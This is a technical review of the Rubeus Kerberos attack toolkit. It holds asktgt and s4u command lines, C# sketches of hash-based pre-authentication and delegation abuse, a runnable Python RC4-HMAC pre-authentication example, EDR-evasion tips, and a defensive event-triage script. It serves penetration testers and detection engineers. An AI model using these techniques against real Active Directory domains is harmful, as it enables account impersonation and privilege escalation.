Rubeus: A C# Toolkit for Kerberos Exploitation in Active Directory Environments
Hook
While most authentication attacks require a password, Rubeus can let you impersonate domain users without ever knowing one: it reuses the key material and the delegation features that Kerberos itself is built on.
Context
Active Directory environments rely on Kerberos as their primary authentication protocol. The protocol was designed at MIT in the 1980s and named after the mythological three-headed dog guarding the underworld. While the protocol is cryptographically sound, its Active Directory implementation adds features (delegation, PKINIT, an RC4 key derived directly from the NT hash) and invites misconfigurations that can be abused for lateral movement and privilege escalation. Before Rubeus, security professionals relied on a fragmented toolkit: Mimikatz for credential extraction, Kekeo for some Kerberos manipulation, and Impacket for cross-platform attacks. Each tool had different syntax, capabilities, and operational characteristics.
Rubeus emerged from the GhostPack collection as a unified, C#-native solution for Kerberos manipulation on Windows. Created by Will Schroeder and heavily based on Benjamin Delpy's Kekeo, it consolidated years of Kerberos exploitation knowledge into a single binary that speaks the protocol natively. For ticket requests Rubeus does not go through the Windows logon path at all: it builds raw Kerberos messages with its own ASN.1 encoder and sends them to the KDC itself, giving penetration testers direct control over authentication flows. This allows techniques the standard Windows authentication mechanisms do not offer, from requesting tickets with a hash or AES key instead of a password to forging tickets entirely offline.
Technical Insight
Rubeus's architecture centers on a direct implementation of the Kerberos protocol using ASN.1 Distinguished Encoding Rules (DER). For AS-REQ and TGS-REQ exchanges it does not call Windows authentication APIs; it constructs and parses Kerberos messages at the byte level and talks to the KDC over TCP port 88. The Windows-side operations (reading tickets from, and injecting tickets into, logon sessions) go through the LSA Kerberos authentication package instead. This split enables requests the standard logon path would never produce, such as pre-authenticating with a hash rather than a password.
The core of Rubeus is its ASN.1 encoding/decoding engine, which constructs protocol messages by hand. When you request a Ticket Granting Ticket (TGT), Rubeus builds the AS-REQ (Authentication Service Request) itself. Here's a simplified sketch (names abbreviated, not a verbatim copy of the source) of how Rubeus requests a TGT using an NT hash instead of a plaintext password:
// Rubeus.exe asktgt /user:jdoe /rc4:8846f7eaee8fb117ad06bdd830b7586c /domain:corp.com
// The NT hash is used directly as the RC4-HMAC (etype 23) long-term key.
byte[] key = Helpers.StringToByteArray("8846f7eaee8fb117ad06bdd830b7586c");
Interop.KERB_ETYPE etype = Interop.KERB_ETYPE.rc4_hmac;
// Build the AS-REQ body (cname = jdoe, realm = CORP.COM, sname = krbtgt/CORP.COM).
AS_REQ asReq = new AS_REQ("jdoe", "corp.com", etype);   // constructor arguments abbreviated
// Pre-authentication data is PA-ENC-TS-ENC: an ASN.1 SEQUENCE holding a KerberosTime
// (a GeneralizedTime such as 20240101120000Z), not a Windows FILETIME.
PA_ENC_TS_ENC timestamp = new PA_ENC_TS_ENC(DateTime.UtcNow);
byte[] tsBytes = timestamp.Encode().Encode();            // AsnElt -> DER bytes
// Encrypt it under the hash with key usage 1 (AS-REQ PA-ENC-TIMESTAMP).
byte[] encTimestamp = Crypto.KerberosEncrypt(
    etype,
    Interop.KRB_KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP,          // = 1
    key,
    tsBytes);
// Wrap it in a PA-DATA of type PA-ENC-TIMESTAMP (padata-type 2) and attach it.
asReq.padata.Add(new PA_DATA(
    Interop.PADATA_TYPE.ENC_TIMESTAMP,
    new EncryptedData(etype, encTimestamp)));
// Send the DER bytes straight to the KDC on TCP port 88 and parse the AS-REP.
string dc = Networking.GetDCName("corp.com");
byte[] response = Networking.SendBytes(dc, 88, asReq.Encode().Encode());
AS_REP asRep = new AS_REP(response);
// The AS-REP enc-part (TGT session key, lifetimes) is encrypted under the same
// key with key usage 3; a successful decrypt proves the hash was correct. The
// ticket and session key are then written as a .kirbi or injected with /ptt.
byte[] encPart = Crypto.KerberosDecrypt(
    etype,
    Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY,            // = 3
    key,
    asRep.enc_part.cipher);
This low-level control enables overpass-the-hash (also called pass-the-key) for Kerberos, something Windows's native logon functions don't offer. Windows derives the RC4-HMAC Kerberos key directly from the NT hash (MD4 over the UTF-16LE password), so the hash is the key: it encrypts the pre-authentication timestamp and decrypts the AS-REP, and the plaintext password is never needed. The same flow works with an AES key (/aes256), which is the better choice in practice: an RC4 AS-REQ from an account that normally negotiates AES stands out in event 4768 (TicketEncryptionType 0x17), and Rubeus's /opsec option, which requires an AES key, exists precisely to avoid that tell.
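The key derivation and pre-authentication steps above, worked through in runnable form. This is an added example written for this page, not Rubeus code: it implements MD4 (the NT hash), RC4 and the RFC 4757 RC4-HMAC transform in pure Python, builds the PA-ENC-TS-ENC structure a client sends, and then plays the KDC side to check it. The function names, the sample password "password" (whose NT hash is the one in the asktgt command above) and the fixed timestamp are this example's own choices.

```python
import hmac, os, struct
from datetime import datetime, timedelta
from hashlib import md5

MASK32 = 0xFFFFFFFF
KU_PA_ENC_TIMESTAMP = 1  # RFC 4120 key usage number for AS-REQ PA-ENC-TIMESTAMP

def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, written out because hashlib's md4 is often absent under OpenSSL 3."""
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F, words in order, shifts 3 7 11 19
            a, b, c, d = d, rotl((a + f(b, c, d) + w[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, words 0 4 8 12 1 5 ..., shifts 3 5 9 13
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + w[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, words 0 8 4 12 2 10 ..., shifts 3 9 11 15
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + w[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); Windows uses it unchanged as the RC4-HMAC (etype 23) key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _usage_bytes(usage: int) -> bytes:
    """RFC 4757 'T': key usage as a 4-byte little-endian int; usages 3 and 23 are remapped to 8 and 13."""
    return struct.pack("<I", {3: 8, 23: 13}.get(usage, usage))

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 section 6: edata = HMAC-MD5(K1, C||P) || RC4(K3, C||P), C = 8-byte random confounder."""
    confounder = confounder or os.urandom(8)
    k1 = hmac.new(key, _usage_bytes(usage), md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum + rc4(k3, confounder + plaintext)

def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes) -> bytes:
    k1 = hmac.new(key, _usage_bytes(usage), md5).digest()
    k3 = hmac.new(k1, edata[:16], md5).digest()
    body = rc4(k3, edata[16:])
    if not hmac.compare_digest(hmac.new(k1, body, md5).digest(), edata[:16]):
        raise ValueError("integrity check failed: wrong key")  # the KDC answers KDC_ERR_PREAUTH_FAILED
    return body[8:]  # drop the confounder

def pa_enc_ts_enc(when: datetime) -> bytes:
    """DER for PA-ENC-TS-ENC ::= SEQUENCE { patimestamp [0] KerberosTime }; pausec omitted.
    KerberosTime is an ASN.1 GeneralizedTime string, not a Windows FILETIME."""
    ts = when.strftime("%Y%m%d%H%M%SZ").encode()
    gentime = bytes([0x18, len(ts)]) + ts           # GeneralizedTime
    tagged = bytes([0xA0, len(gentime)]) + gentime  # [0] EXPLICIT
    return bytes([0x30, len(tagged)]) + tagged      # SEQUENCE

def kdc_validate_preauth(stored_key: bytes, edata: bytes, now: datetime,
                         skew: timedelta = timedelta(minutes=5)) -> datetime:
    """KDC side: decrypt with the account's stored key, then enforce the clock-skew window."""
    der = rc4_hmac_decrypt(stored_key, KU_PA_ENC_TIMESTAMP, edata)
    pos = der.index(0x18)  # first GeneralizedTime tag in the decoded structure
    ts = datetime.strptime(der[pos + 2:pos + 2 + der[pos + 1]].decode(), "%Y%m%d%H%M%SZ")
    if abs(now - ts) > skew:
        raise ValueError("KRB_AP_ERR_SKEW")
    return ts

def demo() -> tuple:
    """Returns (hash hex, valid preauth accepted, wrong key rejected, stale timestamp rejected)."""
    key, now = nt_hash("password"), datetime(2024, 1, 1, 12, 0, 0)
    # client side (asktgt /rc4): the timestamp encrypted under the hash goes into PA-DATA type 2
    edata = rc4_hmac_encrypt(key, KU_PA_ENC_TIMESTAMP, pa_enc_ts_enc(now))
    accepted = kdc_validate_preauth(key, edata, now) == now
    rejected = []
    for k, t in ((nt_hash("Password1"), now), (key, now + timedelta(hours=1))):
        try:
            kdc_validate_preauth(k, edata, t)
            rejected.append(False)
        except ValueError:
            rejected.append(True)
    return key.hex(), accepted, rejected[0], rejected[1]
```

Two things the paragraph alone cannot show: the KDC never sees a password, only the output of MD4 over its UTF-16LE encoding, so anything that yields those 16 bytes (a SAM dump, DCSync, a PKINIT /getcredentials exchange) is as good as the password; and the integrity check in rc4_hmac_decrypt is what turns a wrong key into KDC_ERR_PREAUTH_FAILED, the failure a defender sees as event 4771.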
Rubeus's most powerful feature is its implementation of the Service for User (S4U) extensions, which abuse delegation configurations. S4U2Self and S4U2Proxy were designed to let a service obtain tickets on behalf of users. Rubeus weaponizes this: if an attacker compromises a service account configured for constrained delegation (or one listed in a target's msDS-AllowedToActOnBehalfOfOtherIdentity, the resource-based variant), they can impersonate domain users to the services in the delegation list, with the exception of accounts marked "sensitive and cannot be delegated" or placed in Protected Users. The tool chains S4U2Self (requesting a service ticket to itself on behalf of a user, via the PA-FOR-USER pre-authentication data) with S4U2Proxy (presenting that ticket in the additional-tickets field to request access to the target service):
// Rubeus.exe s4u /user:serviceacct /rc4:hash /impersonateuser:administrator
// /msdsspn:cifs/fileserver.corp.com /ptt
// Simplified sketch (argument and helper names illustrative, not verbatim source).
// Rubeus first obtains a TGT for serviceacct with the supplied hash (the AS-REQ flow above).
// S4U2Self: a TGS-REQ for a ticket to serviceacct's *own* service, carrying a
// PA-FOR-USER padata that names the user to impersonate. The KDC returns a service
// ticket whose client name is "administrator". It is marked forwardable only if
// serviceacct has TrustedToAuthForDelegation (protocol transition) and administrator
// is neither "sensitive and cannot be delegated" nor a Protected User.
TGS_REQ s4uSelfReq = TGS_REQ.NewTGSReq(
    tgt,                                  // serviceacct's TGT and session key
    sname: "serviceacct",                 // the service itself
    s4uUser: "administrator@CORP.COM");   // becomes PA-FOR-USER
Ticket s4uSelfTicket = ParseTgsRep(SendToKdc(s4uSelfReq));
// S4U2Proxy: a TGS-REQ for the real target SPN with the kdc-options bit
// cname-in-addl-tkt (0x00020000, "constrained delegation") set and the S4U2Self
// ticket placed in additional-tickets. The KDC permits it only if the SPN is in
// serviceacct's msDS-AllowedToDelegateTo or, for RBCD, if serviceacct is listed in
// the target's msDS-AllowedToActOnBehalfOfOtherIdentity; in the RBCD case Rubeus
// also adds PA-PAC-OPTIONS with the resource-based-constrained-delegation bit.
TGS_REQ s4uProxyReq = TGS_REQ.NewTGSReq(
    tgt,
    sname: "cifs/fileserver.corp.com",
    additionalTicket: s4uSelfTicket,
    kdcOptions: CONSTRAINED_DELEGATION /* cname-in-addl-tkt */);
Ticket s4uProxyTicket = ParseTgsRep(SendToKdc(s4uProxyReq));
// /ptt: import the final ticket (as a KRB-CRED) into the current logon session via LSA.
LSA.ImportTicket(s4uProxyTicket.ToKirbi(), new LUID());
The ticket injection mechanism talks to the Local Security Authority Subsystem Service (LSASS) through the LSA authentication package interface. Rubeus calls LsaConnectUntrusted and LsaLookupAuthenticationPackage to reach the Kerberos package, then LsaCallAuthenticationPackage with a KERB_SUBMIT_TKT_REQUEST structure (message type KerbSubmitTicketMessage) to import the ticket straight into a logon session's ticket cache. These APIs are documented in ntsecapi.h but rarely used outside LSASS tooling. Nothing is written to disk and the ticket is usable immediately. Importing into the current session needs no special privilege; targeting another session's LUID requires elevation, because Rubeus then registers as a logon process with LsaRegisterLogonProcess, which needs SeTcbPrivilege.
For operational security, Rubeus includes the 'tgtdeleg' trick (inherited from Kekeo), which uses the Kerberos delegation mechanism itself to extract a usable TGT for the current user without opening LSASS memory. When a client authenticates through SSPI to a service whose account is trusted for unconstrained delegation, and the client's TGT is forwardable, Windows automatically places a forwarded TGT (a KRB-CRED) inside the AP-REQ authenticator. Rubeus requests a service ticket for an SPN on such a host (by default a domain controller), calls InitializeSecurityContext with ISC_REQ_DELEGATE, takes the resulting AP-REQ from the output buffer, and decrypts the KRB-CRED with the service ticket's session key, which the Kerberos ticket cache hands back to the user's own process. Everything goes through documented SSPI and LSA calls, so the memory scraping that EDR solutions monitor never happens.
The tool's certificate-based authentication support (PKINIT) is another architectural sophistication. Rubeus can request TGTs using X.509 certificates instead of passwords (/certificate, with /password for the PFX), supporting both user and machine certificates. Combined with certificate theft, or with certificates minted through misconfigured or compromised Certificate Services, this yields access that survives password changes for as long as the certificate is valid; the /getcredentials option even recovers the account's NT hash from the PKINIT exchange (the "UnPAC-the-hash" technique), which brings the attacker back to the hash-based workflows above.
Gotcha
Rubeus's effectiveness comes with significant operational limitations. The tool is heavily signatured by every major antivirus and EDR product; running the pre-compiled binary will trigger immediate alerts in any mature security environment. Red teamers recompile with obfuscation, rename classes and strings, or load the assembly in memory through frameworks like Cobalt Strike. Even then, behavioural detection increasingly catches Rubeus's characteristic patterns: Kerberos traffic to port 88 from a process other than lsass.exe, RC4-encrypted ticket requests (events 4768/4769 with TicketEncryptionType 0x17) from accounts that otherwise negotiate AES, service-ticket requests with the TransitedServices field populated (S4U2Proxy), LSA logon-process registration, and ticket submissions into foreign logon sessions.
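The behavioural tells listed above, expressed as triage logic over a handful of constructed Windows Security events. This is an added example for this page, not code from Rubeus or from any detection product: the key=value line format imitates a SIEM export of 4768/4769 fields (the field names follow the real event schema; the values are made up), and AES_CAPABLE stands in for a directory lookup of msDS-SupportedEncryptionTypes that the example does not perform.

```python
# Constructed sample data: a key=value export of Kerberos events 4768 (TGT request)
# and 4769 (service ticket request). Not real telemetry.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=jdoe TargetDomainName=CORP.COM IpAddress=10.0.5.23 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=asmith TargetDomainName=CORP.COM IpAddress=10.0.5.40 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=legacyapp TargetDomainName=CORP.COM IpAddress=10.0.9.2 TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=jdoe@CORP.COM ServiceName=svc_sql IpAddress=10.0.5.23 TicketEncryptionType=0x17 TicketOptions=0x40810000 TransitedServices=-
EventID=4769 TargetUserName=asmith@CORP.COM ServiceName=FILESERVER$ IpAddress=10.0.5.40 TicketEncryptionType=0x12 TicketOptions=0x40810000 TransitedServices=-
EventID=4769 TargetUserName=administrator@CORP.COM ServiceName=FILESERVER$ IpAddress=10.0.7.9 TicketEncryptionType=0x12 TicketOptions=0x40820010 TransitedServices=serviceacct@CORP.COM
"""

# Assumed result of a directory lookup: accounts whose msDS-SupportedEncryptionTypes allows AES.
# legacyapp is deliberately absent (RC4-only by configuration), so its RC4 tickets are expected.
AES_CAPABLE = {"jdoe", "asmith", "administrator", "fileserver$"}
RC4_HMAC = "0x17"  # TicketEncryptionType value for etype 23


def parse_events(text: str) -> list:
    """Turn the constructed key=value export into one dict per event."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def triage(events: list, aes_capable: set = AES_CAPABLE) -> list:
    """Return (rule, subject, detail) triples, one per Rubeus-shaped anomaly."""
    findings = []
    for e in events:
        user = e.get("TargetUserName", "").split("@")[0].lower()
        etype = e.get("TicketEncryptionType")
        if e.get("EventID") == "4768" and etype == RC4_HMAC and user in aes_capable:
            # asktgt /rc4 (overpass-the-hash): a genuine Windows client on an AES-capable
            # account would have negotiated 0x12/0x11 for its TGT.
            findings.append(("rc4_tgt_from_aes_capable_account", user, e.get("IpAddress")))
        elif e.get("EventID") == "4769":
            svc = e.get("ServiceName", "")
            if etype == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
                # kerberoast: an RC4 service ticket for a user account's SPN, the crackable case.
                findings.append(("rc4_service_ticket_for_user_spn", svc, user))
            if e.get("TransitedServices", "-") not in ("-", ""):
                # s4u: S4U2Proxy fills TransitedServices with the delegating service account.
                findings.append(("s4u2proxy_via_constrained_delegation", user, e["TransitedServices"]))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in triage(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: {subject} ({detail})")
```

The RC4 rules only work against a baseline: an account whose msDS-SupportedEncryptionTypes permits nothing but RC4 (legacyapp here) legitimately shows 0x17 and must not be flagged, and a populated TransitedServices is normal for every service that genuinely uses constrained delegation, so the S4U2Proxy rule is a hunting query to be joined against the list of accounts that are supposed to delegate, not an alert on its own.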
Privilege requirements create another barrier. Some operations, such as Kerberoasting, asktgt with a known key, and tgtdeleg, work with standard user privileges, but extracting other users' tickets from LSA requires elevation (Rubeus impersonates SYSTEM to register as a logon process), and certain attacks assume domain-level privileges or a specific misconfiguration to begin with. The tool cannot magic you past initial access; it is a post-exploitation toolkit that needs an existing foothold. Additionally, Rubeus is Windows-only and .NET-dependent: it is built against .NET Framework 3.5 and 4.0, and it will not run on Linux attack platforms without significant modification (at which point Impacket's example scripts are the better choice). The operational reality is that Rubeus works best when executed in memory on already-compromised Windows systems.
Verdict
Use if: You're conducting authorized penetration tests or red team engagements against Active Directory environments and need precise control over Kerberos authentication flows. Rubeus excels when testing delegation configurations, certificate-based authentication, or Kerberoastable service accounts, and it is ideal for demonstrating risk to security teams around unconstrained delegation, resource-based constrained delegation (RBCD), and certificate authority compromise scenarios. It is the standard choice for post-exploitation lateral movement in Windows domains when you have initial access but need to pivot to additional systems or elevate privileges through ticket manipulation. Skip if: You're looking for defensive tools, automated vulnerability scanners, or cross-platform capabilities. Rubeus is an offensive tool; its only defensive role is generating the telemetry that detection engineers use to validate alerts in a purple-team exercise. If your attack platform is Linux-based, Impacket provides similar capabilities with a different operational profile (traffic from a non-domain-joined host rather than a signatured binary on an endpoint). Organizations wanting to test their defenses against these attacks should map their exposure first with AD assessment tools like PingCastle or BloodHound, then rehearse Rubeus in an isolated lab before touching production. This is not a tool for production networks without explicit authorization and a thorough understanding of Active Directory security.